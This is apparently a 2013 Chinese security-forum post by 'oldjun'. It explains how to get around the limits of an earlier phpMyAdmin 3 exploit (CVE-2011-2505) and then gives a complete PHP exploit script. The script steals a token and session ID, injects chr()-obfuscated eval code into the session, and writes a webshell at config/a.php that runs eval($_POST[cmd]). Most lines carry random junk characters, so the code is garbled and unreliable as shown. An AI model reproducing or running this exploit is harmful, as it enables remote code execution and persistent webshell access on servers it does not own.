最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
/ k4 i! C" }0 Q2 `' y7 N5 T4 f; ~/ j$ y; e$ f/ x
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
$ n8 U# L1 ~; I/ g: P$ }1 g$ F9 W5 H( Y
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:, }. ~; r# V, u/ C
一是session.auto_start = 1;& [" w1 Y" q' @
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。8 }# c& D, @$ d
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
1 f, P& T! q, _' W2 K2 V, Z
' f3 y3 ^' [% V" K( L, `" }4 c3 K在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
5 E" B) r" \, C. X1 n; Q d6 _% r# G$ t+ N
于是写了这个php版本的exp,代码如下:* b( V4 ?5 ~' k) F. r
% `( H& W' |; M1 W#!/usr/bin/php5 K! p' Z! H9 K( \ n$ R1 D
<?php4 O( E6 {8 d& f( X$ m
print_r('0 y, p+ V+ E4 I, `
+---------------------------------------------------------------------------+- ^! k# A: V$ b6 O b, X' Z' v1 T
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
. F* t! n; |" Z- X; Gby oldjun(www.oldjun.com)4 v8 J5 R2 v, w& Q
welcome to www.t00ls.net
! ^* N% Y) o) v/ t' w- qmail: oldjun@gmail.com$ J8 J6 r' Z \8 L
Assigned CVE id: CVE-2011-2505" k3 J+ ?. N6 F# ~8 m) V8 l
+---------------------------------------------------------------------------+$ f8 v* d6 f$ h# T% s
');
; X) H) `; u. B1 o. S2 U
" @9 ^$ K- u# E6 f/**. q# T1 y( ]5 [+ }5 o+ R
* working when the directory:"config" exists and is writeable.8 o, m! d# n- F" X
**/
( Y {4 i1 e$ u# o' q; \ , z' i0 `* x u
if ($argc < 3) {) H- n9 Z1 x2 W1 P& F; i
print_r('# v8 U4 c4 l$ h4 T+ _
+---------------------------------------------------------------------------+0 p6 b7 H1 d9 \5 D9 k3 r
Usage: php '.$argv[0].' host path d" d) |5 A" f1 x# P
host: target server (ip/hostname)7 w5 G* H; x3 k
path: path to pma3
9 I. h& e9 d- j( V6 W) B! @Example:/ ~$ X. g8 m# N. Z
php '.$argv[0].' localhost /pma/9 s; Y% h7 c* D9 ~9 a$ y/ V
+---------------------------------------------------------------------------+
M) ?; s9 \1 e) W( e& H');
9 y, F" z X$ @( u exit;
" K/ g3 ?5 E/ d; L+ m% E6 C}6 U' Q% `% i: G/ k% ]: e1 x- A
& q4 \' p D5 [3 q2 I! \/ _. I
$host = $argv[1];/ W9 s/ W! z, Y, R9 S5 `
$path = $argv[2];! i* [) u) i9 W9 d
3 Z; E/ [" t a, a" x5 u/**2 ^9 @5 F+ `) t8 ]$ `& i; d
* Try to determine if the directory:"config" exists
9 R! w% a( m4 K. n* C$ G**/& `( h# S3 g" L& f/ h
echo "[+] Try to determine if the directory:config exists....\n";
" o, o7 C6 O9 b8 @! W$returnstr=php_request('config/');
9 y: Y8 R0 N1 r, Fif(strpos($returnstr,'404')){
6 |1 ~/ q8 B. d2 C& k4 H) X% f0 c exit("[-] Exploit Failed! The directory:config do not exists!\n");
; j( o/ E% ~, i; v/ @" w5 d) f0 O7 ~}- u0 I' B! I& Z8 |3 P
% `2 G% R$ K. R5 W W) R* j
/**5 J! p" p, Y0 E5 f1 G+ s; t* V
* Try to get token and sessionid
( K- W1 R0 v3 `+ q/ F, F* }**/% g4 j8 }" U- K0 [/ L
echo "[+] Try to get token and sessionid....\n";
' U5 X u- @: D N! p$result=php_request('index.php');3 L& F1 c4 W7 W/ e0 e' V
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);7 S9 Z- `" H1 w% m V" |
$token=$resp[3];' }/ p' a: E4 ~3 Q
$sessionid=$resp[1];6 b, O$ x0 B' _# |2 a' K+ a6 g* b
if($token && $sessionid){5 v9 Q$ X' U% ?, p4 j V; L5 l- v0 Z
echo "[+] token token\n";
8 o* t; j/ q3 Y, `: e echo "[+] Session IDsessionid\n";
9 n: C0 A# j5 R1 a}else{
/ |) I4 ]9 y( m+ G. i# n, _ exit("[-] Can't get token and Session ID,Exploit Failed!\n");
$ k( L( l4 h, b. z) y}
, s9 Q* i: R5 c( F+ Q8 Q2 R+ P
7 b- K6 S( u# \& t$ V/**
6 `5 k8 P- }) ]+ g" M * Try to insert shell into session& L1 f+ U- {( F$ }* O! a) G
**/( N9 \# |/ x C A8 `& o3 [3 ]
echo "[+] Try to insert shell into session....\n";
6 D' I8 l/ ]+ M, o/ ]: }php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.2 c/ ^0 x9 a. J$ W5 W; J+ B5 H6 V; @1 {- r
+ i7 h: g; [! E- {5 d
/**
0 ?: N" W- a, R, R. O, g3 S2 v: v * Try to create webshell
3 r: G& s7 o7 p. P( x**/* D% e' j x5 w) l3 M, s+ X
echo "[+] Try to create webshell....\n";+ v/ S) ], A$ b- X
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
5 T* t1 C% S! l2 p* w1 l/ ]/**
* }: i: r/ _( [, }+ N3 ] * Try to check if the webshell was created successfully" v" o& ?8 U5 F* L( y& A+ f
**/
q/ K: U; ]2 v4 @1 T. i) v6 fecho "[+] Try to check if the webshell was created successfully....\n";+ N8 ~1 o3 T* _$ a0 Y' C7 J
$content=php_request('config/config.inc.php');
3 o* \$ U- _) Wif(strpos($content,'t00ls')){$ T1 ?5 i1 b. x& ~0 _& P& ?
echo "[+] Congratulations! Expoilt successfully....\n";
- T$ m- P9 E ?8 u9 r echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
3 O9 v, V/ {0 J7 d+ R1 @' k6 ^, \}else{8 `2 X8 c0 L* Y9 i( a9 r
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
z1 P0 q: `4 ]4 A* R}
1 B" E! \0 t6 D3 R$ _- l3 A1 w6 z" {6 r4 W- s6 q' Y
function php_request($url,$data='',$cookie=''){
* b7 R1 r$ s- _- C global $host, $path;& I' b: S( q9 @' s( @
. z# d+ W: [3 K. ], @) }8 \ $method=$data?'POST':'GET';
B- c( l' z* e6 s7 d
0 B( T$ L1 w, U' f5 X8 T5 K) \ $packet = $method." ".$path.$url." HTTP/1.1\r\n";1 G9 ^4 g Q$ X. i
$packet .= "Accept: */*\r\n";
9 K( _. a Y, I: j $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";7 f+ a8 P9 o% p8 o
$packet .= "Host: $host\r\n";
3 O$ i2 N" I0 D* }. P! G' n $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
, `2 M" F h% i3 N0 u( a $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";: Z% C! d/ B/ j: L3 s
$packet .= $cookie?"Cookie: $cookie\r\n":"";2 D3 Z$ J0 Z5 N& H8 O8 _' P2 f+ N
$packet .= "Connection: Close\r\n\r\n";4 K) ^; l% I: p: X; O
$packet .= $data?$data:"";
/ m8 ]) ^8 |3 B5 z( \! C4 F- `0 b9 H+ a
$fp = fsockopen(gethostbyname($host), 80);
( B* {' [ ^( h$ k: L if (!$fp) {3 O r& }) E4 [4 K, _, P* V+ v3 h7 n, {
echo 'No response from '.$host; die;& a! e* l+ |3 n
}) ? ]( w b$ s( }1 h p$ Q
fputs($fp, $packet);6 f4 t# }" ~) w% H9 q
( G$ j: w8 C+ h $resp = '';. G- _! o! K9 J2 Q( T( y( q
+ u' M3 a' w, ~, z0 @) z8 [- B0 O1 f
while ($fp && !feof($fp))
/ m- H5 w9 n' R $resp .= fread($fp, 1024);6 z/ j& P# m" x$ O
6 `% D& B& R* R- r& X: p
return $resp;8 _2 h+ ?$ N# l% ?/ ~( U9 a
}
8 G( R; ~# w! l& _) w 7 p6 e( z* P" S: [& `* F9 K: p
?> 3 o# B' q2 E2 [, v, ^3 g
. |
发表于 2013-2-21 09:13:03
收藏
支持
反对